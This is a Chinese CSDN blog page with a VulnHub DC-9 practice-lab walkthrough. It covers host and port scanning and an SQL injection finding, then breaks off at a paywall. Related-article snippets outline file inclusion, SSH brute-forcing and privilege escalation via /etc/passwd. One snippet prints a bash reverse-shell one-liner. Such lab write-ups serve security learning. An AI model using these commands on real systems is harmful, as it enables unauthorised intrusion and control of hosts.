vulnhub靶场渗透练习详解——DC9

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量2k 收藏 7
点赞数 1
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51011609/article/details/126392444
版权

一、安装配置

所需环境:kali、DC-9

DC-9靶场下载:

Vulnerable By Design - Search: dc (Page 3) ~ VulnHub

下载完成后解压,用vmware打开即可,DC-9靶场和kali都设置为NAT模式,这样就是同网段了

二、信息收集

1.扫描主机IP

使用kali中自带的arp-scan工具进行扫描

arp-scan 工具的使用方法:

该工具通过使用自制的arp数据包,同时有人会解析mac地址,并给出对应的硬件厂商名称。且会输出类似arp信息的条目,通过排查得到想要的目标主机的IP地址。  

2.扫描端口信息

nmap -P IP地址

nmap扫描输出的结果中state状态的类型:

open:端口开放

filtsred:被过滤的端口

closed:关闭的端口

unfiltered:未被过滤的

open|filtered:开放或被过滤的

closed|filtered:关闭或被过滤的

3.网站信息收集

浏览器输入ip访问80号端口

针对站点信息进行目录扫描,使用kali自带的目录扫描工具dirbuster,输入站点信息,选择目录文件,开始扫描,扫描过程较慢....

三、漏洞探测

使用AWVS工具对网站进行扫描,根据扫描结果可以看到在http://192.168.192.132/result.php页面存在SQL注入漏洞

最低0.47元/天 解锁文章
.笨南北.
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场实战系列(三)之 dc9
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-11 468
发现存在一个目录包含漏洞,我们这里仔细观察发现,这里爆出来的用户名和之前我们数据库跑出来的用户名字居然可以一一对应上,也就是说,我们跑出来的不是网站的用户,而是登录靶机ssh服务的用户,接下来我们就去爆破ssh服务。在使用fuzz爆破前,这里还有一个点要注意,因为我们要爆破的是登录后的页面,所以我们这里首先要获取他的cookie值,再进行爆破。我们发现这里有两个列,一个是username,一个是password,我们先将这两个列单独提取出来,方便后续的渗透使用。面对这样的一个网页,我们应该怎样入手呢?
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2968
Vulnhub靶机渗透学习——DC-9
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1220
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
靶机10 DC-9(过程超详细)
honest_gg的博客
10-09 2863
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
vulnhubDC9
qq_54030686的博客
06-24 1063
vulnhubDC9这应该是DC系列的最后一篇,相较于其他靶机而言,会比较难一些,提权的方式也较为多样,本文参考 下面的是官方出的wp,上面为一位师傅写的,简述一些流程主机发现,端口扫描 主机开放了22和80端口,但是22端口为过滤状态,无法进行暴力破解 对80端口开放的服务进行指纹识别,这里使用whatweb,棱洞之类也可以 并未识别到网站使用的框架,只能够自己进行检测,这里使用burp和xray联合进行检测,具体操作方法这里不再进行描述, 经过检测,发现result.php界面存在sql注入,但是
DC1-9靶机提权总结
问彡心的博客
09-27 1687
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
DC-9靶场实战
qq_42754807的博客
03-20 847
DC-9靶场实战
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场库中 DC:1
07-06
DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和掌握基础的渗透测试技巧和漏洞利用。 2. **实验环境配置** 在进行渗透测试之前,需要搭建实验环境。这里使用了Vmware Workstation 16作为虚拟机软件,...
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 420
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
DC-9靶机
2301_76690905的博客
12-21 999
端口敲门规则的好处在于隐藏了服务器的实际开放端口,只有知道正确的敲门序列的客户端才能访问服务器,/etc/knockd.conf 文件是 Knockd 服务的配置文件,它用于指定 Knockd 敲门规则,Knockd 是一种端口伪装技术,可以通过在指定的端口序列上发送特殊的数据包来打开一个或多个防火墙规则以允许传入的连接请求通过。
Vulnhub DC-9
Pai_Space
04-11 3102
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3532
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub DC-9靶场
weixin_47019868的博客
11-25 145
Vulnhub DC-9靶场
vulhub靶场学习日记DC9
m0_55763479的博客
09-07 1138
vulhub靶场学习日记DC9
Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)
qq_45722813的博客
12-06 2441
Vulnhub靶场渗透测试DC-4(hydra爆破密码的使用) 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 将下载好的靶机导入到VMware中,修改其网络模式为NAT模式,然后开启靶机 在kali攻击机进行主机发现,获取靶机的IP地址,使用工具arp-scan或者nmap都可以 注意: 如果发现不了靶机IP,则需要修改靶机的网络设置,参考文章https://blog.csdn.net/qq_45722813/article/details/1213246
vulnhub靶场通关
09-09
通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值